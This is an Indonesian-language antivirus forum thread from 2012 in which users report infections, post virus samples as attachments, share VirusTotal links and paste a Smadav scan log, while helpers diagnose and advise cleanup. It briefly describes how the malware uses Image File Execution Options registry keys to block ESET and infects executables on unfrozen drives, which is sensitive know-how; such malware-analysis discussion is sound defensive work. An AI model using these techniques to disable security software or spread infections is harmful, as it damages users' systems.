Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 05, 2012, 01:22:15 AM
Maaf baru balas gann.. Tadi ane makan dan mandi.. Ni baru balek.. Ane coba jalankan sampelnya dulu yahh..
Nanti ane balas lagi yahh setelah dapat hasilnya.. Atau rekan-rekan yang lain juga bisa turut membantu..

Selagi menunggu, mungkin agan bisa lampirkan log hasil scan agan di sini biar lebih jelas..  :)

trims gan  :) ini filenya gan, tadi ane sdh coba pake A*G free, sekarang kompternya sdh lumayan oke, tapi menurut smartp masih ada registry yang yang belum bisa di perpaiki  :-\
Ane baru siap Review gann.. :)
Gak terasa uda pagi.. :)

Kutip
-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe
-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe
Kedua value Registry (ane tau dari log scan Smadav agan) dibuat virus untuk memblok Eset.. Untuk agan pake AVG sekarang, jadi bisa jalan.. :)
Kedua registry ini balik lagi setelah agan clean yahh?

Kutip
komputer ane sdh di deep freeze gan, file ini letaknya di master program di drive lain, yg c sdh dikunci ama deep freeze
Agan kan pake Deep Freeze, koq bisa terkena virus ini yahh? Bisa lebih diperjelas kronologisnya? :)

Kutip
ketahuannya pas ane install komputer baru, pas di klik gak ada respon, trus ane liat di task manager CPU usagenya 50% dan di FD ada folder recycle bin dan di baca sebagai virus oleh smartp
Maksudnya gimana install komputer baru? Maksudnya install ulang (Format) komp yang lain dari yang pake Deep Freeze ini yahh?

Maaf yah gan, ane malah balik bertanya dan bukannya ngasi solusi karena ane belum tahu mau mulai dari mana sebelum tahu lebih jelas perkembangan agan sekarang setelah scan dengan AVG.
Apakah AVG telah membersihkan file .exe agan yang telah terinfeksi? Setelah itu, apakah masih terdapat Folder Recycle di FD jika dicolokkan?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ARRe pada Januari 05, 2012, 09:28:27 AM
Ane baru siap Review gann..
Gak terasa uda pagi..
maaf nih gan baru balas, ane tadi malam nonton film, trus langsung tidur,
sory yah udah membuat agan begadang... ^:)^

Agan kan pake Deep Freeze, koq bisa terkena virus ini yahh? Bisa lebih diperjelas kronologisnya?
kompi ane gak kena virus gan, karena drive C sdh di Deep Freeze(DF) tapi drive yang lain gak ane DF (drive D s/d P) sementara kerja ane menerima /design/cetakan/print spanduk, rata2 mereka mengirimkan filenya melalui UFD,  
File virus ini sdh lama bersarang di kompi ane gan(bukan di sistem), ketahuannya kira2 3 bulan yang lalu, waktu mau instal game farm frenzi di komputerk kakaknya ane, game gak keinstal tapi komputer langsung berat, file nya sdh dihapus karena ane curiga sama ukuran filenya (tapi sepertinya file exe yg ada di kompi ane sdh tukar semua ama virus ini)  :'(

Maksudnya gimana install komputer baru? Maksudnya install ulang (Format) komp yang lain dari yang pake Deep Freeze ini yahh?
install komputer baru dan software aplikasinya(winrar, winnamp, office,  dll) diambil dari kompi ane gan...

Maaf yah gan, ane malah balik bertanya dan bukannya ngasi solusi karena ane belum tahu mau mulai dari mana sebelum tahu lebih jelas perkembangan agan sekarang setelah scan dengan AVG.
Apakah AVG telah membersihkan file .exe agan yang telah terinfeksi? Setelah itu, apakah masih terdapat Folder Recycle di FD jika dicolokkan?

setelah ane scan pake AVG sepertinya virusnya sudah hilang dari sistem kecuali registry yg tadi gak bisa dirubah dan dihapus. dan untuk file yang mengandung virus tadi masih tidak/belum terdeteksi sama AVG dan folder recycle yang ada di FD sudah gak ada lagi setelah dicolokkan
terima kasih ya gan :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 05, 2012, 12:14:58 PM
Kutip
sory yah udah membuat agan begadang...
Gpp koq gann.. Santai aja.. :)
Kutip
kompi ane gak kena virus gan, karena drive C sdh di Deep Freeze(DF) tapi drive yang lain gak ane DF (drive D s/d P) sementara kerja ane menerima /design/cetakan/print spanduk, rata2 mereka mengirimkan filenya melalui UFD, 
File virus ini sdh lama bersarang di kompi ane gan(bukan di sistem), ketahuannya kira2 3 bulan yang lalu, waktu mau instal game farm frenzi di komputerk kakaknya ane, game gak keinstal tapi komputer langsung berat, file nya sdh dihapus karena ane curiga sama ukuran filenya (tapi sepertinya file exe yg ada di kompi ane sdh tukar semua ama virus ini)
Iyahh gann.. Virus ini menginfeksi file-file aplikasi di setiap Drive kecuali yang di dalam folder Windows (C:\Windows). Ada file hasil infeksi yang masih bisa jalan dan ada yang sudah tidak bisa jalan. Tetapi ketika dijalankan, virusnya langsung masuk walaupun aplikasinya sudah error.
Mungkin agan kena virus ini dari FD rekan-rekan yahh? ???
Untung agan pake Deep Freeze, jadi file-file di dalam C: masih aman..

Kutip
setelah ane scan pake AVG sepertinya virusnya sudah hilang dari sistem kecuali registry yg tadi gak bisa dirubah dan dihapus. dan untuk file yang mengandung virus tadi masih tidak/belum terdeteksi sama AVG
Ane upload di virus total.com untuk file-file terinfeksi yang agan upload semalam, katanya sudah terdeteksi AVG. Ini laporannya: http://www.virustotal.com/file-scan/report.html?id=c75f8e28ad85f163f7f4a6c135319c13fbea4ad115de825af56a105c093f4ed1-1325739024

Dan untuk file setup.exe di dalam folder Recycle FD yang tertular itu juga sudah terdeteksi:
http://www.virustotal.com/file-scan/report.html?id=7ecbd14459ca6924d2aaedb0b93edae0b123d9de35c77a288b9babe538c08edf-1325718304

Jadi sekarang file-file exe di tempat agan sudah sembuh atau hilang semuanya? Jika belum, coba agan Update lagi AVG sebelum mulai scan Drive agan yang tidak di-Freeze itu.. Pastikan AVG agan tidak berada dalam Drive yang ikut di-Freeze itu..

Saran ane, lain kali installer-installer agan dikompress aja biar gak terinfeksi.
Tetapi untuk File Installer yang besar, mungkin sangat repot untuk mengkompress dan ekstrak karena butuh waktu yang lama, untuk itu agan bisa lakukan cara ini:

Sorry but you are not allowed to view spoiler contents.
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: ARRe pada Januari 05, 2012, 01:07:40 PM
Ane upload di virus total.com untuk file-file terinfeksi yang agan upload semalam, katanya sudah terdeteksi AVG. Ini laporannya: http://www.virustotal.com/file-scan/report.html?id=c75f8e28ad85f163f7f4a6c135319c13fbea4ad115de825af56a105c093f4ed1-1325739024

Dan untuk file setup.exe di dalam folder Recycle FD yang tertular itu juga sudah terdeteksi:
http://www.virustotal.com/file-scan/report.html?id=7ecbd14459ca6924d2aaedb0b93edae0b123d9de35c77a288b9babe538c08edf-1325718304

Jadi sekarang file-file exe di tempat agan sudah sembuh atau hilang semuanya? Jika belum, coba agan Update lagi AVG sebelum mulai scan Drive agan yang tidak di-Freeze itu.. Pastikan AVG agan tidak berada dalam Drive yang ikut di-Freeze itu..

Saran ane, lain kali installer-installer agan dikompress aja biar gak terinfeksi.
Tetapi untuk File Installer yang besar, mungkin sangat repot untuk mengkompress dan ekstrak karena butuh waktu yang lama, untuk itu agan bisa lakukan cara ini:

Sorry but you are not allowed to view spoiler contents.
maksih atas review dan masukannya gan, :-bd
ane jg lagi memikirkan untuk meng-ISO-kan file2 installer, biar lambat/berat asal selamat ;>  :) :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 05, 2012, 02:42:50 PM
Kutip
maksih atas review dan masukannya gan, :-bd
ane jg lagi memikirkan untuk meng-ISO-kan file2 installer, biar lambat/berat asal selamat ;>  :) :D

Nanti kalo sempat, ane Posting Review selengkapnya yahh gann.. :)
Mohon dikoreksi nanti kalo ada yang salah atau kurang..
Diganti ekstensinya aja sudah cukup koq gann.. Karena virus hanya mengincar ekstensi-ekstensi tertentu aja (seperti exe, com, dan scr). Jadi kalo mengganti ekstensi, virus bakal terkecohh.. dan menganggapnya bukan sebagai file incarannya.. :-bd
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 06, 2012, 10:11:13 PM
buat semuanya deh  :P

jgn didobel klik ya

hati2  ^_^  ^_^  ^_^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 06, 2012, 10:16:06 PM
buat semuanya deh  :P

jgn didobel klik ya

hati2  ^_^  ^_^  ^_^

Makasih gann.. Izin download yahh..
Uda sempat diutak-atik gann? Kalo uda, ceritakan dnk bagaimana tingkah laku virus ini.. Biar yang lain pada tauu..  ;)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 06, 2012, 10:22:06 PM
nambah 1 lagi yaa

 ^_^  ^_^  ^_^  ^_^

hehehehehehe
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 06, 2012, 10:25:38 PM
hehehehehe  ;D  ;D  ;D

satu lagi dch

 ^_^  ^_^  ^_^  ^_^
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 06, 2012, 10:27:19 PM
Alhamdulillaah

akhirnya bisa nyumbang sampel virus jg bwt smadaver
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 06, 2012, 10:29:00 PM
nambah 1 lagi yaa

 ^_^  ^_^  ^_^  ^_^

hehehehehehe
Dua-duanya belum dideteksi Smadav gann..  Semoga bisa menjadi database selanjutnya..  :-bd
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 06, 2012, 10:42:24 PM
Yups,,,
Smadav 8.8.4 yg q pake lum mndeteksi ni virus,, makanya q upload disini biar dteliti klo sempet ma agan2

smoga d v9 atow v8.8.5 atow v8.9 uda dmasukin db ma Mas Zai  :-bd

. a s y i i k .
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 06, 2012, 10:55:03 PM
sampel trakhir yg aq kirim ddteksi sbagai Trojan.Fakealert.26069 oleh Dr.WEB

AV Palsu gitu
Judul: Re: Upload VIRUS ke Forum.. virus Facebook-chat
Ditulis oleh: ponco wiibowo pada Januari 10, 2012, 03:52:49 PM
gw nyumbang virus lagi nih gan,,,  :-bd gw dapet dari chat facebook beberapa hari yg lalu.. cekidot gan!  <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Januari 10, 2012, 08:50:09 PM
gw nyumbang virus lagi nih gan,,,  :-bd gw dapet dari chat facebook beberapa hari yg lalu.. cekidot gan!  <=)
Terima kasih sampelnya, akan segera diteliti dan di masukan ke database selanjutnya. :)
Judul: Re: Upload VIRUS ke Forum.. Virus FB lagi
Ditulis oleh: ponco wiibowo pada Januari 11, 2012, 01:12:46 PM
nemu virus lagi gan kemarin dari Facebook  <=) belum banyak av luar yg bisa kenali,,,

VT Log:
http://www.virustotal.com/file-scan/report.html?id=cf3f92821b975bf8adbc41f17dcde3044218829434aa0854ab60b144137a21ec-1326261624

ThreatExpert Log:
http://www.threatexpert.com/report.aspx?md5=5b45edc572c8561cfd7e98e139e2cd0d


@Milomen:
eh ada momod,,,sama-sama ya gan Momod,,,  :-bd trims atas Tanggapannya ya gan , gw jadi tersanjung <=)
Judul: Re: Upload VIRUS ke Forum.. jpg.exe
Ditulis oleh: ponco wiibowo pada Januari 12, 2012, 02:59:39 PM
cekidot gan,, jpg.exe  <=)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: ARRe pada Januari 12, 2012, 10:33:30 PM
agan2 yg ada disini, mohon pencerahannya yah... ^:)^
ane ada game, yg kalau dijalankan tidak akan terjadi apa2, tapi pas diklik menu yang ada di game ini smartp lsg mendeteksinya sebagai virus dan menutup game tersebut... :-\
pertanyaannya apakah ini benar2 virus?  ???
karena setelah ane scan ulang tidak ada perubahan pada registry atau file yg mencurigakan...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 12, 2012, 10:46:53 PM
agan2 yg ada disini, mohon pencerahannya yah... ^:)^
ane ada game, yg kalau dijalankan tidak akan terjadi apa2, tapi pas diklik menu yang ada di game ini smartp lsg mendeteksinya sebagai virus dan menutup game tersebut... :-\
pertanyaannya apakah ini benar2 virus?  ???
karena setelah ane scan ulang tidak ada perubahan pada registry atau file yg mencurigakan...
100% aman gann.. Walaupun ada beberapa AV yang false detect (https://www.virustotal.com/file/0e12c1b83ef61a7238a228c933637579cc4ecfb5a571c27a2eed2768bc9ff485/analysis/1326383039/) terhadap file ini.
Silakan dilanjutin mainnya.. ;)
Ane suka lagu game ini.. Lagu lama tuhh..  :)
Btw, gann.. Ane uda post report yang lebih lengkap tentang virus yang agan upload.. Coba cek di sini:
http://smadaver.com/konsultasi-virus/mengatasi-virus-flyff-666-dll-vbs/180/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ARRe pada Januari 12, 2012, 10:54:40 PM
agan2 yg ada disini, mohon pencerahannya yah... ^:)^
ane ada game, yg kalau dijalankan tidak akan terjadi apa2, tapi pas diklik menu yang ada di game ini smartp lsg mendeteksinya sebagai virus dan menutup game tersebut... :-\
pertanyaannya apakah ini benar2 virus?  ???
karena setelah ane scan ulang tidak ada perubahan pada registry atau file yg mencurigakan...
100% aman gann.. Walaupun ada beberapa AV yang false detect (https://www.virustotal.com/file/0e12c1b83ef61a7238a228c933637579cc4ecfb5a571c27a2eed2768bc9ff485/analysis/1326383039/) terhadap file ini.
Silakan dilanjutin mainnya.. ;)
Ane suka lagu game ini.. Lagu lama tuhh..  :)
Btw, gann.. Ane uda post report yang lebih lengkap tentang virus yang agan upload.. Coba cek di sini:
http://smadaver.com/konsultasi-virus/mengatasi-virus-flyff-666-dll-vbs/180/
terima kasih gann...  :-X :-bd
ane baca dl ya....  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Januari 12, 2012, 11:17:26 PM
Kutip
terima kasih gann...  :-X :-bd
ane baca dl ya....  :)
Sama2 gann..

File game yang agan upload tadi uda pantau lebih jauh lagi dan ternyata ngak ada sama sekali koneksi internet yang dilakukannya..  :)
Smadav sendiri mendeteksinya sebagai New Heur.Variant yang berarti virus yang belum masuk ke databasenya..
Mungkin kesalahan deteksi ini dikarenakan file game agan tadi membuat file baru bernama: Ki2005.hst pada C:\windows padahal dia bukan Installer. Memang ada virus yang bertinngkah seperti itu yang begitu dijalankan tiba-tiba ada penambahan file di Folder Windows.

Barusan ane upload jiga file Ki2005.hst ke virustotal.com dan hasilnya >100% clear (https://www.virustotal.com/file/4c6f13145ec85eead4ef7b87389d7e265e1d59b98e4d2c318cebdf6a4492f895/analysis/1326384730/)<

Sorry but you are not allowed to view spoiler contents.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ARRe pada Januari 12, 2012, 11:32:09 PM
Kutip
Sorry but you are not allowed to view spoiler contents.
he..he..he..  :D  ;D =)) ane kaga ngerti gan ^_^ ^_^ ^_^
Sorry but you are not allowed to view spoiler contents.
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 13, 2012, 06:42:40 AM
Boss,, aq punya sampel mirip dengan infeksi Ramnit pd .htm .html

klo filenya dbuka pake Notepad,,, pada bagian bawah sendiri akan ada semacem script virus,,, setelah melihat dr Virustotal.com 14/42 AV mndeteksi adanya infeksi file trsebut,,, salah satu AV mndeteksinya sbgai Virus.VBS.Sasan

 :D  :D  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada Januari 13, 2012, 07:40:03 AM
Boss,, aq punya sampel mirip dengan infeksi Ramnit pd .htm .html

klo filenya dbuka pake Notepad,,, pada bagian bawah sendiri akan ada semacem script virus,,, setelah melihat dr Virustotal.com 14/42 AV mndeteksi adanya infeksi file trsebut,,, salah satu AV mndeteksinya sbgai Virus.VBS.Sasan

 :D  :D  :D

what the password ?
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Januari 14, 2012, 09:16:42 AM
nemu virus lagi gan kemarin dari Facebook  <=) belum banyak av luar yg bisa kenali,,,

VT Log:
http://www.virustotal.com/file-scan/report.html?id=cf3f92821b975bf8adbc41f17dcde3044218829434aa0854ab60b144137a21ec-1326261624

ThreatExpert Log:
http://www.threatexpert.com/report.aspx?md5=5b45edc572c8561cfd7e98e139e2cd0d


@Milomen:
eh ada momod,,,sama-sama ya gan Momod,,,  :-bd trims atas Tanggapannya ya gan , gw jadi tersanjung <=)
Terima kasih sampelnya, sampel anda sudah kami terima dan untuk antivirus impor sudah banyak mengenali sebagai virus Trojan.Downloader.

Boss,, aq punya sampel mirip dengan infeksi Ramnit pd .htm .html

klo filenya dbuka pake Notepad,,, pada bagian bawah sendiri akan ada semacem script virus,,, setelah melihat dr Virustotal.com 14/42 AV mndeteksi adanya infeksi file trsebut,,, salah satu AV mndeteksinya sbgai Virus.VBS.Sasan

 :D  :D  :D
Sampel virus yang anda upload rusak.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada Januari 17, 2012, 10:59:56 AM
Boss,, aq punya sampel mirip dengan infeksi Ramnit pd .htm .html

klo filenya dbuka pake Notepad,,, pada bagian bawah sendiri akan ada semacem script virus,,, setelah melihat dr Virustotal.com 14/42 AV mndeteksi adanya infeksi file trsebut,,, salah satu AV mndeteksinya sbgai Virus.VBS.Sasan

 :D  :D  :D
terdeteksi sebagai VBS/AutoRun.AO virus di ESET
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 17, 2012, 05:54:30 PM
maap yaa,, numpang kirim virus lagi ni,,
waktu buka Smadav,, Smadav bilang klo lg ad proses virus yang aktif,, tyus dscan otomatois,, Smadav mndteksi ad Sality dkompi aq,,,,
coba tak scan 3x pake DrWebCureIt, Sality n Virut Killer by Kaspersky hasilnya nihil,,,

pkoknya tiap kali buka Smadav katanya lg ad proses virus aktif,,

tk coba 1 file yang dcurigai sbagai Sality tersebut n aq upload d virustotal.com hasilnya 4/41 AV mndteksi sbagai varian Kazy

mohon dtindak lanjuti
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 17, 2012, 05:55:32 PM
isi smadav.log

==============================
Log File of Smadav 2011 Rev. 8.8
==============================

Scanning Results :
=> Time & Date : 17:31:35, on 01-17-2012
=> Finishing Time : 4 seconds
=> Folder Scanned :0
=> File Scanned : 0
=> File Detected : 22
=> File Cleaned : 0
=> Value Scanned : 967
=> Value Detected: 4
=> Value Fixed: 0
=> Path Scanned: 0
=> Path Hidden: 1
=> Path Unhidden: 0

==============================
Before Scanning
==============================
Suspected Paths :
=> Fine(Level 2) as  : 2 Process
   -C:\Windows\System32\nvvsvc.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\IObit\Advanced SystemCare 5\ASCService.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Zentimo\ZentimoService.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\IObit\IObit Malware Fighter\IMFsrv.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\IObit\Smart Defrag 2\SmartDefrag.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files\Unlocker\UnlockerAssistant.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -D:\% M.A.S.T.E.R  P.R.O.G.R.A.M\Kemo AntiVirus Indonesia 9.7-1\KEMO AntiVirus.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files\Internet Download Manager\IDMan.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files\Zentimo\Zentimo.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Panda USB Vaccine\USBVaccine.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\IObit\Advanced SystemCare 5\ASCTray.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcAppFlt.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Windows\System32\vmnat.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\VMware\VMware Player\vmware-authd.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Windows\System32\vmnetdhcp.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcIp.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Internet Download Manager\IEMonitor.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Users\Administrator\AppData\Roaming\svchost.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\IObit\Game Booster 3\gbtray.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Opera\opera.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Smart\CDMA USB Modem\CDMA USB Modem.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\CCleaner\CCleaner.exe
=> Fine(Level 1) as  : 1 Startup
   -C:\Users\Administrator\AppData\Roaming\file.exe
=> Fine(Level 2) as  : 1 Startup
   -c:\Windows\System32\Macromed\Flash\flashplayerupdateservice.exe
=> Fine(Level 2) as  : 1 Startup
   -c:\program files\glary utilities\initialize.exe
=> Unknown(Level 4) as  : 3 RegString
   -cmd.exe

Running Processes :
=> N/A
=> N/A
=> C:\Windows\System32\smss.exe
=> C:\Windows\System32\csrss.exe
=> C:\Windows\System32\wininit.exe
=> C:\Windows\System32\csrss.exe
=> C:\Windows\System32\services.exe
=> C:\Windows\System32\lsass.exe
=> C:\Windows\System32\lsm.exe
=> C:\Windows\System32\winlogon.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files\IObit\Advanced SystemCare 5\ASCService.exe
=> C:\Program Files\Zentimo\ZentimoService.exe
=> C:\Windows\System32\nvvsvc.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\nvvsvc.exe
=> C:\Windows\System32\spoolsv.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files\IObit\IObit Malware Fighter\IMFsrv.exe
=> C:\Windows\System32\taskhost.exe
=> C:\Windows\System32\dwm.exe
=> C:\Windows\explorer.exe
=> C:\Windows\System32\taskeng.exe
=> C:\Program Files\IObit\Smart Defrag 2\SmartDefrag.exe
=> C:\Program Files\Unlocker\UnlockerAssistant.exe
=> D:\% M.A.S.T.E.R  P.R.O.G.R.A.M\Kemo AntiVirus Indonesia 9.7-1\KEMO AntiVirus.exe
=> C:\Program Files\Internet Download Manager\IDMan.exe
=> C:\Program Files\Zentimo\Zentimo.exe
=> C:\Program Files\Panda USB Vaccine\USBVaccine.exe
=> C:\Program Files\Smadav\SMΔRTP.exe
=> C:\Program Files\IObit\Advanced SystemCare 5\ASCTray.exe
=> C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcAppFlt.exe
=> C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
=> C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
=> C:\Windows\System32\vmnat.exe
=> C:\Program Files\VMware\VMware Player\vmware-authd.exe
=> C:\Windows\System32\vmnetdhcp.exe
=> C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcIp.exe
=> C:\Program Files\Internet Download Manager\IEMonitor.exe
=> C:\Users\Administrator\AppData\Roaming\svchost.exe
=> C:\Windows\System32\wbem\WmiPrvSE.exe
=> C:\Program Files\IObit\Game Booster 3\gbtray.exe
=> C:\Program Files\Opera\opera.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files\Smart\CDMA USB Modem\CDMA USB Modem.exe
=> C:\Windows\System32\audiodg.exe
=> C:\Windows\System32\msiexec.exe
=> C:\Windows\servicing\TrustedInstaller.exe
=> C:\Program Files\CCleaner\CCleaner.exe
=> C:\Program Files\Smadav\SMΔRTP.exe

==============================
After Scanning
==============================
Suspected Paths :
=> Fine(Level 2) as  : 2 Process
   -C:\Windows\System32\nvvsvc.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\IObit\Advanced SystemCare 5\ASCService.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Zentimo\ZentimoService.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\IObit\IObit Malware Fighter\IMFsrv.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\IObit\Smart Defrag 2\SmartDefrag.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files\Unlocker\UnlockerAssistant.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -D:\% M.A.S.T.E.R  P.R.O.G.R.A.M\Kemo AntiVirus Indonesia 9.7-1\KEMO AntiVirus.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files\Internet Download Manager\IDMan.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files\Zentimo\Zentimo.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Panda USB Vaccine\USBVaccine.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\IObit\Advanced SystemCare 5\ASCTray.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcAppFlt.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Windows\System32\vmnat.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\VMware\VMware Player\vmware-authd.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Windows\System32\vmnetdhcp.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcIp.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Internet Download Manager\IEMonitor.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Users\Administrator\AppData\Roaming\svchost.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\IObit\Game Booster 3\gbtray.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Opera\opera.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Smart\CDMA USB Modem\CDMA USB Modem.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\CCleaner\CCleaner.exe
=> Fine(Level 1) as  : 1 Startup
   -C:\Users\Administrator\AppData\Roaming\file.exe
=> Fine(Level 2) as  : 1 Startup
   -c:\Windows\System32\Macromed\Flash\flashplayerupdateservice.exe
=> Fine(Level 2) as  : 1 Startup
   -c:\program files\glary utilities\initialize.exe
=> Unknown(Level 4) as  : 3 RegString
   -cmd.exe

Running Processes :
=> N/A
=> N/A
=> C:\Windows\System32\smss.exe
=> C:\Windows\System32\csrss.exe
=> C:\Windows\System32\wininit.exe
=> C:\Windows\System32\csrss.exe
=> C:\Windows\System32\services.exe
=> C:\Windows\System32\lsass.exe
=> C:\Windows\System32\lsm.exe
=> C:\Windows\System32\winlogon.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files\IObit\Advanced SystemCare 5\ASCService.exe
=> C:\Program Files\Zentimo\ZentimoService.exe
=> C:\Windows\System32\nvvsvc.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\nvvsvc.exe
=> C:\Windows\System32\spoolsv.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files\IObit\IObit Malware Fighter\IMFsrv.exe
=> C:\Windows\System32\taskhost.exe
=> C:\Windows\System32\dwm.exe
=> C:\Windows\explorer.exe
=> C:\Windows\System32\taskeng.exe
=> C:\Program Files\IObit\Smart Defrag 2\SmartDefrag.exe
=> C:\Program Files\Unlocker\UnlockerAssistant.exe
=> D:\% M.A.S.T.E.R  P.R.O.G.R.A.M\Kemo AntiVirus Indonesia 9.7-1\KEMO AntiVirus.exe
=> C:\Program Files\Internet Download Manager\IDMan.exe
=> C:\Program Files\Zentimo\Zentimo.exe
=> C:\Program Files\Panda USB Vaccine\USBVaccine.exe
=> C:\Program Files\Smadav\SMΔRTP.exe
=> C:\Program Files\IObit\Advanced SystemCare 5\ASCTray.exe
=> C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcAppFlt.exe
=> C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
=> C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
=> C:\Windows\System32\vmnat.exe
=> C:\Program Files\VMware\VMware Player\vmware-authd.exe
=> C:\Windows\System32\vmnetdhcp.exe
=> C:\Program Files\NVIDIA Corporation\NetworkAccessManager\bin32\nSvcIp.exe
=> C:\Program Files\Internet Download Manager\IEMonitor.exe
=> C:\Users\Administrator\AppData\Roaming\svchost.exe
=> C:\Windows\System32\wbem\WmiPrvSE.exe
=> C:\Program Files\IObit\Game Booster 3\gbtray.exe
=> C:\Program Files\Opera\opera.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files\Smart\CDMA USB Modem\CDMA USB Modem.exe
=> C:\Windows\System32\audiodg.exe
=> C:\Windows\System32\msiexec.exe
